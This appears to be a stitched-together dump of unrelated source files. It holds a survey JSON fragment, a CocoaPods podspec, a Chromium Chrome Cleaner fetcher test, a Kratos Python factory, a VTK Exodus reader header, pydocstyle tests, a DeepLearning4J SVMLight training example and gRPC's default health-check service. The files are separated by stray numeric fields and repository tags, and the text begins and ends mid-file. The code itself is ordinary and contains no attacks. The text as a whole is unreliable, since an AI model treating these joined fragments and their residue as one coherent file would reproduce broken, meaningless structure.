"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "permission_to_quote"
},
{
"type": "radiogroup",
"name": "willing_talk",
"title": "Would you be willing to talk to someone at Code.org about your PD experiences? ",
"isRequired": true,
"choices": [
{
"value": "yes",
"text": "Yes"
},
{
"value": "no",
"text": "No"
}
]
}
]
}
]
} | 2,025 |
5,169 | <reponame>Gantios/Specs<filename>Specs/7/8/d/WAMSimpleDataSource/0.1.1/WAMSimpleDataSource.podspec.json<gh_stars>1000+
{
"name": "WAMSimpleDataSource",
"version": "0.1.1",
"summary": "An easier way to create readable static table view data source",
"homepage": "https://github.com/WAMaker/WAMSimpleDataSource",
"authors": {
"WAMaker": "https://github.com/WAMaker"
},
"license": {
"type": "MIT",
"file": "LICENSE"
},
"source": {
"git": "https://github.com/WAMaker/WAMSimpleDataSource.git",
"tag": "0.1.1"
},
"platforms": {
"ios": "8.0"
},
"requires_arc": true,
"source_files": "WAMSimpleDataSource/*.{h,m}"
}
| 282 |
575 | // Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/safe_browsing/chrome_cleaner/chrome_cleaner_fetcher_win.h"
#include "base/base_paths.h"
#include "base/bind.h"
#include "base/callback.h"
#include "base/callback_helpers.h"
#include "base/files/file_path.h"
#include "base/files/file_util.h"
#include "base/memory/ptr_util.h"
#include "base/run_loop.h"
#include "base/test/task_environment.h"
#include "chrome/browser/safe_browsing/chrome_cleaner/srt_field_trial_win.h"
#include "content/public/test/browser_task_environment.h"
#include "net/base/net_errors.h"
#include "net/base/network_change_notifier.h"
#include "net/http/http_status_code.h"
#include "services/network/test/test_url_loader_factory.h"
#include "testing/gmock/include/gmock/gmock.h"
#include "testing/gtest/include/gtest/gtest.h"
#include "url/gurl.h"
namespace safe_browsing {
namespace {
class ChromeCleanerFetcherTest : public ::testing::Test {
public:
ChromeCleanerFetcherTest()
: task_environment_(base::test::TaskEnvironment::MainThreadType::IO) {}
void TearDown() override {
if (!downloaded_path_.empty()) {
base::DeleteFile(downloaded_path_);
if (base::IsDirectoryEmpty(downloaded_path_.DirName()))
base::DeleteFile(downloaded_path_.DirName());
}
}
void StartFetch() {
FetchChromeCleaner(
base::BindOnce(&ChromeCleanerFetcherTest::FetchedCallback,
base::Unretained(this)),
&test_url_loader_factory_);
}
void FetchedCallback(base::FilePath downloaded_path,
ChromeCleanerFetchStatus fetch_status) {
callback_called_ = true;
downloaded_path_ = downloaded_path;
fetch_status_ = fetch_status;
run_loop_.Quit();
}
protected:
base::test::TaskEnvironment task_environment_;
network::TestURLLoaderFactory test_url_loader_factory_;
base::RunLoop run_loop_;
// Variables set by FetchedCallback().
bool callback_called_ = false;
base::FilePath downloaded_path_;
ChromeCleanerFetchStatus fetch_status_ =
ChromeCleanerFetchStatus::kOtherFailure;
};
TEST_F(ChromeCleanerFetcherTest, FetchSuccess) {
const std::string kFileContents("FileContents");
test_url_loader_factory_.AddResponse(GetSRTDownloadURL().spec(),
kFileContents);
StartFetch();
run_loop_.Run();
EXPECT_TRUE(callback_called_);
EXPECT_EQ(downloaded_path_, downloaded_path_);
EXPECT_EQ(fetch_status_, ChromeCleanerFetchStatus::kSuccess);
std::string file_contents;
EXPECT_TRUE(ReadFileToString(downloaded_path_, &file_contents));
EXPECT_EQ(kFileContents, file_contents);
}
TEST_F(ChromeCleanerFetcherTest, NotFoundOnServer) {
test_url_loader_factory_.AddResponse(GetSRTDownloadURL().spec(), "",
net::HTTP_NOT_FOUND);
StartFetch();
run_loop_.Run();
EXPECT_TRUE(callback_called_);
EXPECT_TRUE(downloaded_path_.empty());
EXPECT_EQ(fetch_status_, ChromeCleanerFetchStatus::kNotFoundOnServer);
}
TEST_F(ChromeCleanerFetcherTest, NetworkError) {
// For this test, just use any http response code other than net::HTTP_OK
// and net::HTTP_NOT_FOUND.
test_url_loader_factory_.AddResponse(
GetSRTDownloadURL(), network::mojom::URLResponseHead::New(), "contents",
network::URLLoaderCompletionStatus(net::ERR_ADDRESS_INVALID));
StartFetch();
run_loop_.Run();
EXPECT_TRUE(callback_called_);
EXPECT_TRUE(downloaded_path_.empty());
EXPECT_EQ(fetch_status_, ChromeCleanerFetchStatus::kOtherFailure);
}
} // namespace
} // namespace safe_browsing
| 1,421 |
778 | <reponame>lkusch/Kratos
import KratosMultiphysics
import KratosMultiphysics.FluidDynamicsApplication as KratosFluid
def Factory(settings, Model):
if(type(settings) != KratosMultiphysics.Parameters):
raise Exception("expected input shall be a Parameters object, encapsulating a json string")
# Backwards compatibility helper
if settings["Parameters"].Has("parallel_type"):
settings["Parameters"].RemoveValue("parallel_type")
warn_msg = "\"parallel_type\" is no longer needed. Removing from input settings."
KratosMultiphysics.Logger.PrintWarning('\n\x1b[1;31mDEPRECATION-WARNING\x1b[0m', warn_msg)
if settings["Parameters"].Has("output_configuration"):
settings["Parameters"].RemoveValue("output_configuration")
warn_msg = "\"output_configuration\" is no longer needed as the visualization mesh is no longer print in the \"ApplyEmbeddedSkinVisualizationProcess\". Removing from input settings.\n"
warn_msg += "Add your preferred output process in the \"output_process_list\" of the simulation settings (namely ProjectParameters.json)."
KratosMultiphysics.Logger.PrintWarning('\n\x1b[1;31mDEPRECATION-WARNING\x1b[0m', warn_msg)
return KratosFluid.EmbeddedSkinVisualizationProcess(Model, settings["Parameters"]) | 429 |
1,755 | <gh_stars>1000+
/*=========================================================================
Program: Visualization Toolkit
Module: vtkPExodusIIReader.h
Copyright (c) <NAME>, <NAME>, <NAME>
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================*/
/*----------------------------------------------------------------------------
Copyright (c) Sandia Corporation
See Copyright.txt or http://www.paraview.org/HTML/Copyright.html for details.
----------------------------------------------------------------------------*/
/**
* @class vtkPExodusIIReader
* @brief Read Exodus II files (.exii)
*
* vtkPExodusIIReader is a unstructured grid source object that reads
* ExodusII files. Most of the meta data associated with the
* file is loaded when UpdateInformation is called. This includes
* information like Title, number of blocks, number and names of
* arrays. This data can be retrieved from methods in this
* reader. Separate arrays that are meant to be a single vector, are
* combined internally for convenience. To be combined, the array
* names have to be identical except for a trailing X,Y and Z (or
* x,y,z). By default all cell and point arrays are loaded. However,
* the user can flag arrays not to load with the methods
* "SetPointDataArrayLoadFlag" and "SetCellDataArrayLoadFlag". The
* reader responds to piece requests by loading only a range of the
* possible blocks. Unused points are filtered out internally.
*/
#ifndef vtkPExodusIIReader_h
#define vtkPExodusIIReader_h
#include "vtkExodusIIReader.h"
#include "vtkIOParallelExodusModule.h" // For export macro
#include <vector> // Required for vector
class vtkTimerLog;
class vtkMultiProcessController;
class VTKIOPARALLELEXODUS_EXPORT vtkPExodusIIReader : public vtkExodusIIReader
{
public:
static vtkPExodusIIReader* New();
vtkTypeMacro(vtkPExodusIIReader, vtkExodusIIReader);
void PrintSelf(ostream& os, vtkIndent indent) override;
///@{
/**
* Set/get the communication object used to relay a list of files
* from the rank 0 process to all others. This is the only interprocess
* communication required by vtkPExodusIIReader.
*/
void SetController(vtkMultiProcessController* c);
vtkGetObjectMacro(Controller, vtkMultiProcessController);
///@}
///@{
/**
* These methods tell the reader that the data is distributed across
* multiple files. This is for distributed execution. It this case,
* pieces are mapped to files. The pattern should have one %d to
* format the file number. FileNumberRange is used to generate file
* numbers. I was thinking of having an arbitrary list of file
* numbers. This may happen in the future. (That is why there is no
* GetFileNumberRange method.
*/
vtkSetFilePathMacro(FilePattern);
vtkGetFilePathMacro(FilePattern);
vtkSetFilePathMacro(FilePrefix);
vtkGetFilePathMacro(FilePrefix);
///@}
///@{
/**
* Set the range of files that are being loaded. The range for single
* file should add to 0.
*/
void SetFileRange(int, int);
void SetFileRange(int* r) { this->SetFileRange(r[0], r[1]); }
vtkGetVector2Macro(FileRange, int);
///@}
/**
* Provide an arbitrary list of file names instead of a prefix,
* pattern and range. Overrides any prefix, pattern and range
* that is specified. vtkPExodusIIReader makes it's own copy
* of your file names.
*/
void SetFileNames(int nfiles, const char** names);
void SetFileName(VTK_FILEPATH const char* name) override;
/**
* Return pointer to list of file names set in SetFileNames
*/
char** GetFileNames() { return this->FileNames; }
/**
* Return number of file names set in SetFileNames
*/
int GetNumberOfFileNames() { return this->NumberOfFileNames; }
///@{
/**
* Return the number of files to be read.
*/
vtkGetMacro(NumberOfFiles, int);
///@}
vtkIdType GetTotalNumberOfElements() override;
vtkIdType GetTotalNumberOfNodes() override;
/**
* Sends metadata (that read from the input file, not settings modified
* through this API) from the rank 0 node to all other processes in a job.
*/
virtual void Broadcast(vtkMultiProcessController* ctrl);
///@{
/**
* The size of the variable cache in MegaByes. This represents the maximum
* size of cache that a single partition reader can have while reading. When
* a reader is finished its cache size will be set to a fraction of this based
* on the number of partitions.
* The Default for this is 100MiB.
* Note that because each reader still holds
* a fraction of the cache size after reading the total amount of data cached
* can be at most twice this size.
*/
vtkGetMacro(VariableCacheSize, double);
vtkSetMacro(VariableCacheSize, double);
///@}
protected:
vtkPExodusIIReader();
~vtkPExodusIIReader() override;
///@{
/**
* Try to "guess" the pattern of files.
*/
int DeterminePattern(const char* file);
static int DetermineFileId(const char* file);
///@}
// holds the size of the variable cache in GigaBytes
double VariableCacheSize;
// **KEN** Previous discussions concluded with std classes in header
// files is bad. Perhaps we should change ReaderList.
vtkMultiProcessController* Controller;
vtkIdType ProcRank;
vtkIdType ProcSize;
char* FilePattern;
char* CurrentFilePattern;
char* FilePrefix;
char* CurrentFilePrefix;
char* MultiFileName;
int FileRange[2];
int CurrentFileRange[2];
int NumberOfFiles;
char** FileNames;
int NumberOfFileNames;
std::vector<vtkExodusIIReader*> ReaderList;
std::vector<int> NumberOfPointsPerFile;
std::vector<int> NumberOfCellsPerFile;
int LastCommonTimeStep;
int Timing;
vtkTimerLog* TimerLog;
int RequestInformation(vtkInformation*, vtkInformationVector**, vtkInformationVector*) override;
int RequestData(vtkInformation*, vtkInformationVector**, vtkInformationVector*) override;
private:
vtkPExodusIIReader(const vtkPExodusIIReader&) = delete;
void operator=(const vtkPExodusIIReader&) = delete;
};
#endif
| 1,876 |
776 | """Tests for the violations.Error class."""
import pytest
import collections
import textwrap
from pydocstyle.violations import Error
MockDefinition = collections.namedtuple('MockDefinition', ['source', 'start'])
def test_message_without_context():
"""Test a simple error message without parameters."""
error = Error('CODE', 'an error', None)
assert error.message == 'CODE: an error'
def test_message_with_context():
"""Test an error message with parameters."""
error = Error('CODE', 'an error', 'got {}', 0)
assert error.message == 'CODE: an error (got 0)'
def test_message_with_insufficient_parameters():
"""Test an error message with invalid parameter invocation."""
error = Error('CODE', 'an error', 'got {}')
with pytest.raises(IndexError):
assert error.message
def test_lines():
"""Test proper printing of source lines, including blank line trimming."""
error = Error('CODE', 'an error', None)
definition = MockDefinition(source=['def foo():\n',
' """A docstring."""\n',
'\n',
' pass\n',
'\n',
'\n'],
start=424)
error.set_context(definition, None)
print(error.lines)
assert error.lines == textwrap.dedent('''\
424: def foo():
425: """A docstring."""
426:
427: pass
''')
| 693 |
1,763 | <gh_stars>1000+
/* *****************************************************************************
*
*
*
* This program and the accompanying materials are made available under the
* terms of the Apache License, Version 2.0 which is available at
* https://www.apache.org/licenses/LICENSE-2.0.
* See the NOTICE file distributed with this work for additional
* information regarding copyright ownership.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* SPDX-License-Identifier: Apache-2.0
******************************************************************************/
package org.deeplearning4j.datapipelineexamples.formats.svmlight;
import org.datavec.api.conf.Configuration;
import org.datavec.api.records.reader.impl.misc.SVMLightRecordReader;
import org.datavec.api.split.FileSplit;
import org.deeplearning4j.datapipelineexamples.utils.DownloaderUtility;
import org.deeplearning4j.datasets.datavec.RecordReaderDataSetIterator;
import org.deeplearning4j.nn.conf.MultiLayerConfiguration;
import org.deeplearning4j.nn.conf.NeuralNetConfiguration;
import org.deeplearning4j.nn.conf.WorkspaceMode;
import org.deeplearning4j.nn.conf.layers.DenseLayer;
import org.deeplearning4j.nn.conf.layers.OutputLayer;
import org.deeplearning4j.nn.multilayer.MultiLayerNetwork;
import org.deeplearning4j.nn.weights.WeightInit;
import org.deeplearning4j.optimize.listeners.ScoreIterationListener;
import org.nd4j.evaluation.classification.Evaluation;
import org.nd4j.linalg.activations.Activation;
import org.nd4j.linalg.api.ndarray.INDArray;
import org.nd4j.linalg.dataset.DataSet;
import org.nd4j.linalg.dataset.api.iterator.DataSetIterator;
import org.nd4j.linalg.learning.config.Adam;
import org.nd4j.linalg.lossfunctions.LossFunctions;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.File;
public class SVMLightExample {
private static Logger log = LoggerFactory.getLogger(SVMLightExample.class);
public static String dataLocalPath;
public static void main(String[] args) throws Exception {
int numOfFeatures = 784; // For MNIST data set, each row is a 1D expansion of a handwritten digits picture of size 28x28 pixels = 784
int numOfClasses = 10; // 10 classes (types of senders) in the data set. Zero indexing. Classes have integer values 0, 1 or 2 ... 9
int batchSize = 10; // 1000 examples, with batchSize is 10, around 100 iterations per epoch
int printIterationsNum = 20; // print score every 20 iterations
int hiddenLayer1Num = 200;
long seed = 42;
int nEpochs = 4;
dataLocalPath = DownloaderUtility.DATAEXAMPLES.Download();
Configuration config = new Configuration();
config.setBoolean(SVMLightRecordReader.ZERO_BASED_INDEXING, true);
config.setInt(SVMLightRecordReader.NUM_FEATURES, numOfFeatures);
SVMLightRecordReader trainRecordReader = new SVMLightRecordReader();
trainRecordReader.initialize(config, new FileSplit(new File(dataLocalPath,"MnistSVMLightExample/mnist_svmlight_train_1000.txt")));
DataSetIterator trainIter = new RecordReaderDataSetIterator(trainRecordReader, batchSize, numOfFeatures, numOfClasses);
SVMLightRecordReader testRecordReader = new SVMLightRecordReader();
testRecordReader.initialize(config, new FileSplit(new File(dataLocalPath,"MnistSVMLightExample/mnist_svmlight_test_100.txt")));
DataSetIterator testIter = new RecordReaderDataSetIterator(testRecordReader, batchSize, numOfFeatures, numOfClasses);
log.info("Build model....");
MultiLayerConfiguration conf = new NeuralNetConfiguration.Builder()
.seed(seed)
.trainingWorkspaceMode(WorkspaceMode.ENABLED)
.activation(Activation.RELU)
.weightInit(WeightInit.XAVIER)
.updater(Adam.builder().learningRate(0.02).beta1(0.9).beta2(0.999).build())
.l2(1e-4)
.list()
.layer(new DenseLayer.Builder().nIn(numOfFeatures).nOut(hiddenLayer1Num)
.build())
.layer(new OutputLayer.Builder(LossFunctions.LossFunction.NEGATIVELOGLIKELIHOOD)
.activation(Activation.SOFTMAX)
.nIn(hiddenLayer1Num).nOut(numOfClasses).build())
.build();
//run the model
MultiLayerNetwork model = new MultiLayerNetwork(conf);
model.init();
model.setListeners(new ScoreIterationListener(printIterationsNum));
for ( int n = 0; n < nEpochs; n++) {
model.fit(trainIter);
log.info(String.format("Epoch %d finished training", n + 1));
// evaluate the model on test data, once every second epoch
if ((n + 1) % 2 == 0) {
//evaluate the model on the test set
Evaluation eval = new Evaluation(numOfClasses);
testIter.reset();
while(testIter.hasNext()) {
DataSet t = testIter.next();
INDArray features = t.getFeatures();
INDArray labels = t.getLabels();
INDArray predicted = model.output(features, false);
eval.eval(labels, predicted);
}
log.info(String.format("Evaluation on test data - [Epoch %d] [Accuracy: %.3f, P: %.3f, R: %.3f, F1: %.3f] ",
n + 1, eval.accuracy(), eval.precision(), eval.recall(), eval.f1()));
log.info(eval.stats());
}
}
System.out.println("Finished...");
}
}
| 2,240 |
2,151 | /*
*
* Copyright 2016 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <memory>
#include <mutex>
#include <grpc/slice.h>
#include <grpc/support/alloc.h>
#include <grpc/support/log.h>
#include <grpcpp/impl/codegen/method_handler_impl.h>
#include "pb_decode.h"
#include "pb_encode.h"
#include "src/core/ext/filters/client_channel/health/health.pb.h"
#include "src/cpp/server/health/default_health_check_service.h"
namespace grpc {
//
// DefaultHealthCheckService
//
DefaultHealthCheckService::DefaultHealthCheckService() {
services_map_[""].SetServingStatus(SERVING);
}
void DefaultHealthCheckService::SetServingStatus(
const grpc::string& service_name, bool serving) {
std::unique_lock<std::mutex> lock(mu_);
if (shutdown_) {
// Set to NOT_SERVING in case service_name is not in the map.
serving = false;
}
services_map_[service_name].SetServingStatus(serving ? SERVING : NOT_SERVING);
}
void DefaultHealthCheckService::SetServingStatus(bool serving) {
const ServingStatus status = serving ? SERVING : NOT_SERVING;
std::unique_lock<std::mutex> lock(mu_);
if (shutdown_) {
return;
}
for (auto& p : services_map_) {
ServiceData& service_data = p.second;
service_data.SetServingStatus(status);
}
}
void DefaultHealthCheckService::Shutdown() {
std::unique_lock<std::mutex> lock(mu_);
if (shutdown_) {
return;
}
shutdown_ = true;
for (auto& p : services_map_) {
ServiceData& service_data = p.second;
service_data.SetServingStatus(NOT_SERVING);
}
}
DefaultHealthCheckService::ServingStatus
DefaultHealthCheckService::GetServingStatus(
const grpc::string& service_name) const {
std::lock_guard<std::mutex> lock(mu_);
auto it = services_map_.find(service_name);
if (it == services_map_.end()) {
return NOT_FOUND;
}
const ServiceData& service_data = it->second;
return service_data.GetServingStatus();
}
void DefaultHealthCheckService::RegisterCallHandler(
const grpc::string& service_name,
std::shared_ptr<HealthCheckServiceImpl::CallHandler> handler) {
std::unique_lock<std::mutex> lock(mu_);
ServiceData& service_data = services_map_[service_name];
service_data.AddCallHandler(handler /* copies ref */);
HealthCheckServiceImpl::CallHandler* h = handler.get();
h->SendHealth(std::move(handler), service_data.GetServingStatus());
}
void DefaultHealthCheckService::UnregisterCallHandler(
const grpc::string& service_name,
const std::shared_ptr<HealthCheckServiceImpl::CallHandler>& handler) {
std::unique_lock<std::mutex> lock(mu_);
auto it = services_map_.find(service_name);
if (it == services_map_.end()) return;
ServiceData& service_data = it->second;
service_data.RemoveCallHandler(handler);
if (service_data.Unused()) {
services_map_.erase(it);
}
}
DefaultHealthCheckService::HealthCheckServiceImpl*
DefaultHealthCheckService::GetHealthCheckService(
std::unique_ptr<ServerCompletionQueue> cq) {
GPR_ASSERT(impl_ == nullptr);
impl_.reset(new HealthCheckServiceImpl(this, std::move(cq)));
return impl_.get();
}
//
// DefaultHealthCheckService::ServiceData
//
void DefaultHealthCheckService::ServiceData::SetServingStatus(
ServingStatus status) {
status_ = status;
for (auto& call_handler : call_handlers_) {
call_handler->SendHealth(call_handler /* copies ref */, status);
}
}
void DefaultHealthCheckService::ServiceData::AddCallHandler(
std::shared_ptr<HealthCheckServiceImpl::CallHandler> handler) {
call_handlers_.insert(std::move(handler));
}
void DefaultHealthCheckService::ServiceData::RemoveCallHandler(
const std::shared_ptr<HealthCheckServiceImpl::CallHandler>& handler) {
call_handlers_.erase(handler);
}
//
// DefaultHealthCheckService::HealthCheckServiceImpl
//
namespace {
const char kHealthCheckMethodName[] = "/grpc.health.v1.Health/Check";
const char kHealthWatchMethodName[] = "/grpc.health.v1.Health/Watch";
} // namespace
DefaultHealthCheckService::HealthCheckServiceImpl::HealthCheckServiceImpl(
DefaultHealthCheckService* database,
std::unique_ptr<ServerCompletionQueue> cq)
: database_(database), cq_(std::move(cq)) {
// Add Check() method.
AddMethod(new internal::RpcServiceMethod(
kHealthCheckMethodName, internal::RpcMethod::NORMAL_RPC, nullptr));
// Add Watch() method.
AddMethod(new internal::RpcServiceMethod(
kHealthWatchMethodName, internal::RpcMethod::SERVER_STREAMING, nullptr));
// Create serving thread.
thread_ = std::unique_ptr<::grpc_core::Thread>(
new ::grpc_core::Thread("grpc_health_check_service", Serve, this));
}
DefaultHealthCheckService::HealthCheckServiceImpl::~HealthCheckServiceImpl() {
// We will reach here after the server starts shutting down.
shutdown_ = true;
{
std::unique_lock<std::mutex> lock(cq_shutdown_mu_);
cq_->Shutdown();
}
thread_->Join();
}
void DefaultHealthCheckService::HealthCheckServiceImpl::StartServingThread() {
// Request the calls we're interested in.
// We do this before starting the serving thread, so that we know it's
// done before server startup is complete.
CheckCallHandler::CreateAndStart(cq_.get(), database_, this);
WatchCallHandler::CreateAndStart(cq_.get(), database_, this);
// Start serving thread.
thread_->Start();
}
void DefaultHealthCheckService::HealthCheckServiceImpl::Serve(void* arg) {
HealthCheckServiceImpl* service =
reinterpret_cast<HealthCheckServiceImpl*>(arg);
void* tag;
bool ok;
while (true) {
if (!service->cq_->Next(&tag, &ok)) {
// The completion queue is shutting down.
GPR_ASSERT(service->shutdown_);
break;
}
auto* next_step = static_cast<CallableTag*>(tag);
next_step->Run(ok);
}
}
bool DefaultHealthCheckService::HealthCheckServiceImpl::DecodeRequest(
const ByteBuffer& request, grpc::string* service_name) {
std::vector<Slice> slices;
if (!request.Dump(&slices).ok()) return false;
uint8_t* request_bytes = nullptr;
size_t request_size = 0;
grpc_health_v1_HealthCheckRequest request_struct;
request_struct.has_service = false;
if (slices.size() == 1) {
request_bytes = const_cast<uint8_t*>(slices[0].begin());
request_size = slices[0].size();
} else if (slices.size() > 1) {
request_bytes = static_cast<uint8_t*>(gpr_malloc(request.Length()));
uint8_t* copy_to = request_bytes;
for (size_t i = 0; i < slices.size(); i++) {
memcpy(copy_to, slices[i].begin(), slices[i].size());
copy_to += slices[i].size();
}
}
pb_istream_t istream = pb_istream_from_buffer(request_bytes, request_size);
bool decode_status = pb_decode(
&istream, grpc_health_v1_HealthCheckRequest_fields, &request_struct);
if (slices.size() > 1) {
gpr_free(request_bytes);
}
if (!decode_status) return false;
*service_name = request_struct.has_service ? request_struct.service : "";
return true;
}
bool DefaultHealthCheckService::HealthCheckServiceImpl::EncodeResponse(
ServingStatus status, ByteBuffer* response) {
grpc_health_v1_HealthCheckResponse response_struct;
response_struct.has_status = true;
response_struct.status =
status == NOT_FOUND
? grpc_health_v1_HealthCheckResponse_ServingStatus_SERVICE_UNKNOWN
: status == SERVING
? grpc_health_v1_HealthCheckResponse_ServingStatus_SERVING
: grpc_health_v1_HealthCheckResponse_ServingStatus_NOT_SERVING;
pb_ostream_t ostream;
memset(&ostream, 0, sizeof(ostream));
pb_encode(&ostream, grpc_health_v1_HealthCheckResponse_fields,
&response_struct);
grpc_slice response_slice = grpc_slice_malloc(ostream.bytes_written);
ostream = pb_ostream_from_buffer(GRPC_SLICE_START_PTR(response_slice),
GRPC_SLICE_LENGTH(response_slice));
bool encode_status = pb_encode(
&ostream, grpc_health_v1_HealthCheckResponse_fields, &response_struct);
if (!encode_status) return false;
Slice encoded_response(response_slice, Slice::STEAL_REF);
ByteBuffer response_buffer(&encoded_response, 1);
response->Swap(&response_buffer);
return true;
}
//
// DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler
//
void DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
CreateAndStart(ServerCompletionQueue* cq,
DefaultHealthCheckService* database,
HealthCheckServiceImpl* service) {
std::shared_ptr<CallHandler> self =
std::make_shared<CheckCallHandler>(cq, database, service);
CheckCallHandler* handler = static_cast<CheckCallHandler*>(self.get());
{
std::unique_lock<std::mutex> lock(service->cq_shutdown_mu_);
if (service->shutdown_) return;
// Request a Check() call.
handler->next_ =
CallableTag(std::bind(&CheckCallHandler::OnCallReceived, handler,
std::placeholders::_1, std::placeholders::_2),
std::move(self));
service->RequestAsyncUnary(0, &handler->ctx_, &handler->request_,
&handler->writer_, cq, cq, &handler->next_);
}
}
DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
CheckCallHandler(ServerCompletionQueue* cq,
DefaultHealthCheckService* database,
HealthCheckServiceImpl* service)
: cq_(cq), database_(database), service_(service), writer_(&ctx_) {}
void DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
OnCallReceived(std::shared_ptr<CallHandler> self, bool ok) {
if (!ok) {
// The value of ok being false means that the server is shutting down.
return;
}
// Spawn a new handler instance to serve the next new client. Every handler
// instance will deallocate itself when it's done.
CreateAndStart(cq_, database_, service_);
// Process request.
gpr_log(GPR_DEBUG, "[HCS %p] Health check started for handler %p", service_,
this);
grpc::string service_name;
grpc::Status status = Status::OK;
ByteBuffer response;
if (!service_->DecodeRequest(request_, &service_name)) {
status = Status(StatusCode::INVALID_ARGUMENT, "could not parse request");
} else {
ServingStatus serving_status = database_->GetServingStatus(service_name);
if (serving_status == NOT_FOUND) {
status = Status(StatusCode::NOT_FOUND, "service name unknown");
} else if (!service_->EncodeResponse(serving_status, &response)) {
status = Status(StatusCode::INTERNAL, "could not encode response");
}
}
// Send response.
{
std::unique_lock<std::mutex> lock(service_->cq_shutdown_mu_);
if (!service_->shutdown_) {
next_ =
CallableTag(std::bind(&CheckCallHandler::OnFinishDone, this,
std::placeholders::_1, std::placeholders::_2),
std::move(self));
if (status.ok()) {
writer_.Finish(response, status, &next_);
} else {
writer_.FinishWithError(status, &next_);
}
}
}
}
void DefaultHealthCheckService::HealthCheckServiceImpl::CheckCallHandler::
OnFinishDone(std::shared_ptr<CallHandler> self, bool ok) {
if (ok) {
gpr_log(GPR_DEBUG, "[HCS %p] Health check call finished for handler %p",
service_, this);
}
self.reset(); // To appease clang-tidy.
}
//
// DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler
//
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
CreateAndStart(ServerCompletionQueue* cq,
DefaultHealthCheckService* database,
HealthCheckServiceImpl* service) {
std::shared_ptr<CallHandler> self =
std::make_shared<WatchCallHandler>(cq, database, service);
WatchCallHandler* handler = static_cast<WatchCallHandler*>(self.get());
{
std::unique_lock<std::mutex> lock(service->cq_shutdown_mu_);
if (service->shutdown_) return;
// Request AsyncNotifyWhenDone().
handler->on_done_notified_ =
CallableTag(std::bind(&WatchCallHandler::OnDoneNotified, handler,
std::placeholders::_1, std::placeholders::_2),
self /* copies ref */);
handler->ctx_.AsyncNotifyWhenDone(&handler->on_done_notified_);
// Request a Watch() call.
handler->next_ =
CallableTag(std::bind(&WatchCallHandler::OnCallReceived, handler,
std::placeholders::_1, std::placeholders::_2),
std::move(self));
service->RequestAsyncServerStreaming(1, &handler->ctx_, &handler->request_,
&handler->stream_, cq, cq,
&handler->next_);
}
}
DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
WatchCallHandler(ServerCompletionQueue* cq,
DefaultHealthCheckService* database,
HealthCheckServiceImpl* service)
: cq_(cq), database_(database), service_(service), stream_(&ctx_) {}
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
OnCallReceived(std::shared_ptr<CallHandler> self, bool ok) {
if (!ok) {
// Server shutting down.
//
// AsyncNotifyWhenDone() needs to be called before the call starts, but the
// tag will not pop out if the call never starts (
// https://github.com/grpc/grpc/issues/10136). So we need to manually
// release the ownership of the handler in this case.
GPR_ASSERT(on_done_notified_.ReleaseHandler() != nullptr);
return;
}
// Spawn a new handler instance to serve the next new client. Every handler
// instance will deallocate itself when it's done.
CreateAndStart(cq_, database_, service_);
// Parse request.
if (!service_->DecodeRequest(request_, &service_name_)) {
SendFinish(std::move(self),
Status(StatusCode::INVALID_ARGUMENT, "could not parse request"));
return;
}
// Register the call for updates to the service.
gpr_log(GPR_DEBUG,
"[HCS %p] Health watch started for service \"%s\" (handler: %p)",
service_, service_name_.c_str(), this);
database_->RegisterCallHandler(service_name_, std::move(self));
}
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
SendHealth(std::shared_ptr<CallHandler> self, ServingStatus status) {
std::unique_lock<std::mutex> lock(send_mu_);
// If there's already a send in flight, cache the new status, and
// we'll start a new send for it when the one in flight completes.
if (send_in_flight_) {
pending_status_ = status;
return;
}
// Start a send.
SendHealthLocked(std::move(self), status);
}
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
SendHealthLocked(std::shared_ptr<CallHandler> self, ServingStatus status) {
send_in_flight_ = true;
// Construct response.
ByteBuffer response;
bool success = service_->EncodeResponse(status, &response);
// Grab shutdown lock and send response.
std::unique_lock<std::mutex> cq_lock(service_->cq_shutdown_mu_);
if (service_->shutdown_) {
SendFinishLocked(std::move(self), Status::CANCELLED);
return;
}
if (!success) {
SendFinishLocked(std::move(self),
Status(StatusCode::INTERNAL, "could not encode response"));
return;
}
next_ = CallableTag(std::bind(&WatchCallHandler::OnSendHealthDone, this,
std::placeholders::_1, std::placeholders::_2),
std::move(self));
stream_.Write(response, &next_);
}
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
OnSendHealthDone(std::shared_ptr<CallHandler> self, bool ok) {
if (!ok) {
SendFinish(std::move(self), Status::CANCELLED);
return;
}
std::unique_lock<std::mutex> lock(send_mu_);
send_in_flight_ = false;
// If we got a new status since we started the last send, start a
// new send for it.
if (pending_status_ != NOT_FOUND) {
auto status = pending_status_;
pending_status_ = NOT_FOUND;
SendHealthLocked(std::move(self), status);
}
}
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
SendFinish(std::shared_ptr<CallHandler> self, const Status& status) {
if (finish_called_) return;
std::unique_lock<std::mutex> cq_lock(service_->cq_shutdown_mu_);
if (service_->shutdown_) return;
SendFinishLocked(std::move(self), status);
}
